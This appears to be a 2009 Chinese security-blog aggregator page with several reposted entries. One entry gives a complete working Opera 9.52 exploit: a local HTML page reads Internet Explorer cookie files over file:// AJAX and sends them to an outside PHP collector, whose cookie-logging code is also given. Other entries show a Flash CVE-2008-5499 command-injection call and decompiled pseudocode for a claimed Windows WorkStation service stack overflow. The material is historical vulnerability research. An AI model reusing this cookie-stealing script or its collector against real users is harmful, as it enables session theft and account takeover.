2009-1-5 17:00

anehta DEMO站点恢复了

之前由于朋友的服务器配置有点问题,所以无法访问,现在恢复了

http://www.secwiki.com/anehta


放在上面的录像现在也可以看了
类别:象牙塔 查看评论
aullik5 | RSS

2009-1-5 15:26

Flash的 CVE-2008-5499 执行任意命令漏洞笔记

看到DM大牛blog上提到了,就看了下,简单做下笔记


几篇文章的汇聚地址可以看dm的blog
http://hi.baidu.com/int3/blog/item/ff3ebb6261e86adae6113a86.html

CVE-2008-5499

flash的一个任意执行命令漏洞,只发生在linux平台上,且需要安装帮助,原文是(a valid helper application)

问题出在这个API调用: ASnative(2201, 2)("validAdobeApp", ";arbitrary command") 阅读全文
类别:象牙塔 查看评论
aullik5 | RSS

2009-1-5 14:14

opera 9.52使用ajax读取本地文件漏洞

Hack Eye! ( http://www.hackeye.com/ ) :

by 空虚浪子心

这也可能是一个安全特性吧,opera可以使用ajax读取本地文件。

ff3没有这个漏洞。

不废话,看代码吧。

利用方式如下:

这段代码保存为本地htm文件,然后使用opera打开。

将会把本地用户名为administrator在alibaba的cookie,发送到http://www.inbreak.net/kxlzxtest/testxss/a.php

    <iframe id="framekxlzx" width=0 height=0></iframe>  
   <script>  
   var xmlHttp;  
   function createXMLHttp(){  
       if(window.XMLHttpRequest){  
           xmlHttp = new XMLHttpRequest();          
       }  
       else if(window.ActiveXObject){  
           xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");  
      }  
  }  
 
  function startRequest(doUrl){  
 
      createXMLHttp();  
 
      xmlHttp.onreadystatechange = handleStateChange;  
 
      xmlHttp.open("GET", doUrl, true);  
 
      xmlHttp.send(null);  
 
 
  }   
 
  function handleStateChange(){  
      if (xmlHttp.readyState == 4 ){  
              var strResponse = "";  
              setTimeout("framekxlzxPost(xmlHttp.responseText)", 1000);   
 
      }  
  }  
 
  function doMyAjax(user,file)  
  {  
          var time = Math.random();  
 
          var strPer = 'file://localhost/C:/Documents%20and%20Settings/'+user+'/Cookies/'+file+'?time='+time;  
 
          startRequest(strPer);  
 
  }  
 
  function framekxlzxPost(text)  
  {  
      document.getElementById('framekxlzx').src="http://www.inbreak.net/kxlzxtest/testxss/a.php?cookie="+escape(text);  
      alert(/ok/);  
  }  
 
  doMyAjax('administrator','administrator@alibaba[1].txt');  
 
  </script>  
 a.php代码:

    <?php      
 
   $user_IP = ($_SERVER["HTTP_VIA"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"];  
   $user_IP = ($user_IP) ? $user_IP : $_SERVER["REMOTE_ADDR"];   
 
   $fp = fopen($user_IP.date("Y-m-d H:i:s")."cookie.txt","wb");     
   fwrite($fp,$_GET["cookie"]);      
   fclose($fp);    
   ?>     
a.php会按照   IP+时间+cookie.txt 格式生成一个txt文件。
例如:121.0.29.2252009-01-05 11:55:02cookie.txt



里面保存着administrator@alibaba[1].txt的内容。



几点说明:

1,cookie文件是IE的,比较XX,但是有很多人都会IE和opera混用。

2,必须预测本地用户名,不过很多人都是administrator。

3,必须预测cookie文件名。这个可以取一些常用网站的,反正ajax是异步,你可以同时调用几个方法。

4,或者你可以发送任何本地TXT文件。



opera可能说这是特性?不知道了,反正FF3没这个漏洞,使用这种方式会报错访问拒绝。 

 

 from:http://www.inbreak.net/?action=show&id=141

neeao | RSS

2009-1-5 12:08

opera 9.52使用ajax读取本地文件漏洞

这也可能是一个安全特性吧,opera可以使用ajax读取本地文件。

ff3没有这个漏洞。

不废话,看代码吧。

利用方式如下:

这段代码保存为本地htm文件,然后使用opera打开。

将会把本地用户名为administrator在alibaba的cookie,发送到http://www.inbreak.net/kxlzxtest/testxss/a.php



阅读全文

空虚浪子心 | RSS

2009-1-5 10:43

大成视界

won@unnoo用业余时间,做了一份大成天下的渠道刊物,命名为《大成视界》。
我心里还是很感激的,感激同事能够积极主动地补上公司资源不足的空挡,主动做事,谢谢won!



QQ文件中转站下载: 阅读全文
类别:默认分类 查看评论
wulujia | RSS

2009-1-5 10:25

CVE-2008-5499

Adobe前几天紧急出了一个Flash for Linux的补丁,Immunityinc的CEU页面也立即有了相应的working exploit,反应真的很快啊,不过他们也给出了技术细节。貌似HDM还搞了一个fuzzer,有兴趣的朋友可以看看。


类别:网络安全 查看评论
int3 | RSS

2009-1-5 09:33

Windows WorkStation Remote BufferOverflow(0day)

Hack Eye! ( http://www.hackeye.com/ ) :

Microsoft Windows WorkStation 服务(windows xp sp3)存在栈溢出漏洞。
a5这个参数,由于在执行wcscpy的字符串拷贝前,没有校验字符串的长度,因此会诱发栈缓冲区溢出(Stack Overflow) ,成功利用可以远程执行任意代码。

存在漏洞DLL 文件: wkssvc 或者 wkssvc.dll
DLL 名称: Network Workstation service library
描述:
wkssvc.dll是本地系统进行远程文件打印相关服务文件。

属于: Windows
系统 DLL文件: 是


分析如下(伪代码):
/*
Found by Friddy 12.25
Email:qianyang@ssyeah.com
http://www.friddy.cn
*/
DWORD __userpurge sub_76854A96<eax>(int a1<eax>, HLOCAL *a2<esi>, int a3, wchar_t *a4,wchar_t *a5,int a6, int a7, int a8)
{
  int v8; // eax@1
  int v9; // ebx@1
  HLOCAL v10; // eax@3
  HLOCAL v11; // eax@4
  HLOCAL v12; // eax@7
  HLOCAL v13; // edi@7
  int v15; // ecx@4
  int v16; // edx@4
  int v17; // eax@4
  char v18; // zf@4
  wchar_t *v19; // ST0C_4@5

  v9 = a1;
  v8 = 0;
  if ( a4 )
    v8 = *(_WORD *)(a7 + 2);
  v10 = LocalAlloc(0x40u, v8 + ((2 * v9 + 39) & 0xFFFFFFFE));
  *a2 = v10;
  if ( v10 )
  {
    *(_DWORD *)v10 = 0;
    v15 = a3;
    v16 = a8;
    *((_DWORD *)*a2 + 3) = v9;
    *((_DWORD *)*a2 + 4) = 1;
    *((_DWORD *)*a2 + 5) = v15;
    v17 = dword_7686F588;
    *((_DWORD *)*a2 + 6) = dword_7686F588;
    v18 = a4 == 0;
    *((_DWORD *)*a2 + 8) = v16;
    dword_7686F588 = (v17 + 1) & 0x7FFFFFFF;
    v11 = *a2;
    if ( v18 )
    {
      *((_DWORD *)v11 + 2) = 0;
      *((_DWORD *)*a2 + 7) = 0;
    }
    else
    {
      v19 = a4;
      *((_DWORD *)v11 + 2) = (char *)v11 + 36;
      wcscpy(*((wchar_t **)*a2 + 2), v19);
      *((_DWORD *)*a2 + 7) = (unsigned int)(*a2 + 2 * v9 + 39) & 0xFFFFFFFE;
      wcscpy(*((wchar_t **)*a2 + 7), *(const wchar_t **)(a7 + 4));
    }
    if ( !a5 )
      return 0;
    v12 = LocalAlloc(0x40u, 2 * a6 + 12);
    v13 = v12;
    if ( v12 )
    {
     wcscpy((wchar_t *)v12 + 4, a5);//栈溢出发生在这里
      *((_DWORD *)v13 + 1) = a6;
      *(_DWORD *)v13 = 1;
      *((_DWORD *)*a2 + 1) = v13;
      return 0;
    }
    LocalFree(*a2);
  }
  return GetLastError();
}

###############################################################################################################################################################################################################
//----- (7685499D) --------------------------------------------------------
signed int __stdcall sub_7685499D(int a1, int a2, wchar_t *a3, int a4, wchar_t *a5, int a6, int a7, int a8)
{
  signed int v8; // edi@1
  DWORD v9; // eax@2
  wchar_t *v10; // ecx@7
  int v12; // eax@21
  int v13; // [sp+14h] [bp-4h]@1
  int v14; // [sp+10h] [bp-8h]@1
  int v15; // [sp+Ch] [bp-Ch]@2

  v8 = 0;
  v13 = 0;
  v14 = 0;
  if ( !(unsigned __int8)RtlAcquireResourceExclusive(&unk_7686F3E4, 1) )
  {
    v8 = 2140;
    goto LABEL_18;
  }
  v9 = sub_76852B71((int)&dword_7686F3E0, a1, (int)&v15, 1);
  if ( v9 )
    goto LABEL_13;
  if ( *(_DWORD *)(dword_7686F3E0 + 12 * v15) )
    sub_76854B88(*(_DWORD *)(dword_7686F3E0 + 12 * v15), a5, (int)&v13, (int)&v14);
  if ( v13 )
  {
    if ( !a3 && !*(_DWORD *)(v13 + 8) )
    {
      ++*(_DWORD *)(v13 + 16);
      ++**(_DWORD **)(v13 + 4);
      goto LABEL_17;
    }
    v9 = sub_76854A96(a4, (HLOCAL *)&a3, a2, a3, 0, 0, a7, a8);
    if ( !v9 )
    {
      v12 = *(_DWORD *)(v13 + 4);
      v10 = a3;
      *((_DWORD *)a3 + 1) = *(_DWORD *)(v13 + 4);
      ++*(_DWORD *)v12;
      goto LABEL_8;
    }
LABEL_13:
    v8 = v9;
LABEL_17:
    RtlReleaseResource(&unk_7686F3E4);
LABEL_18:
    NtClose(a2);
    return v8;
  }
  v9 = sub_76854A96(a4, (HLOCAL *)&a3, a2, a3, a5, a6, a7, a8);//这里调用了漏洞,由此触发
  if ( v9 )
    goto LABEL_13;
  v10 = a3;
LABEL_8:
  if ( v14 )
    *(_DWORD *)v14 = v10;
  else
    *(_DWORD *)(dword_7686F3E0 + 12 * v15) = v10;
  RtlReleaseResource(&unk_7686F3E4);
  return 0;

 

from:http://www.friddy.cn/article.asp?id=66

neeao | RSS

2009-1-5 09:22

迅雷中奖欺诈--互联网网络天下众生,难以独善其身

收到了一些迅雷中奖欺诈。目前的欺诈网页,大多都有相当的水准,而且很有被仿冒者的页面风格。

这里有些有失专业水准了,如图所示。

阅读全文
类别:业界感悟 查看评论
eanalysis | RSS

2009-1-5 00:38

JAVAWEB应用的policy安全配置值得深思

在JAVAWEB容器中 设置policy是靠不住的,只能说是提高了门槛。对java的运行权限安全配置才是王道
Terminator:Skynet | RSS

2009-1-4 23:58

预测09年安全趋势

阅读全文
类别:疯狂工作 查看评论
icbmx2 | RSS
分页: [<<] [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [>>]

目录

统计信息

搜索

友情链接

图标

  • 本站支持 WAP 访问
  • 订阅本站的 RSS 2.0 新闻聚合

Powered By SXNA 1.7

Copyright 2004-2009 银色巢穴. Some Rights Reserved.